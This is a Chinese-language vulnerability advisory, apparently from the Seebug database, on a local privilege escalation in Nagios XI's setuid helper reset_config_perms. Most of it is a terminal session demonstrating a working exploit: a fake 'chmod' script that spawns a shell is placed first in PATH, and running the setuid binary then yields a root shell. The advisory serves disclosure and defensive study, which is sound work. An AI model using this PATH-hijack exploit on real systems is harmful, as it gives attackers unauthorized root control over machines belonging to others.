Nagios XI 'reset_configs-perms.c'本地特权提升漏洞

2011-05-13T00:00:00
ID SSV:20549
Type seebug
Reporter Root
Modified 2011-05-13T00:00:00

Description

Bugtraq ID: 47827

Nagios是一个监视系统运行状态和网络信息的监视系统。 Nagios 'reset_configs-perms.c'没有正确验证'setuid()'函数的调用的返回值,本地攻击者可以利用漏洞获得root特权。 0 Nagios XI 厂商解决方案 目前没有详细解决方案提供: http://www.nagios.org/

                                        
                                            
                                                rootbsd () laptop:~$ id
uid=1001(rootbsd) gid=1001(rootbsd) groupes=1001(rootbsd)
rootbsd () laptop:~$ ls -l /usr/local/nagiosxi/scripts/reset_config_perms
-rwsr-xr-x 1 root nagios 5258 2011-04-11 20:38 reset_config_perms
rootbsd () laptop:~$ cat /usr/local/nagiosxi/scripts/reset_config_perms.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   if(setuid( 0 )!=0)
        printf("ERROR TRYING TO SETUID ROOT!\n");
        else
                printf("SETUID ROOT OK\n");
   system( "/usr/local/nagiosxi/scripts/reset_config_perms.sh" );

   return 0;
}


rootbsd () laptop:~$ cat /home/rootbsd/chmod
#!/usr/bin/ksh
ksh
rootbsd () laptop:~$ chmod 755 /home/rootbsd/chmod
rootbsd () laptop:~$ export PATH=/home/rootbsd:$PATH
rootbsd () laptop:~$ /usr/local/nagiosxi/scripts/reset_config_perms
SETUID ROOT OK
RESETTING PERMS
# id
uid=0(root) gid=0(root) groupes=0(root)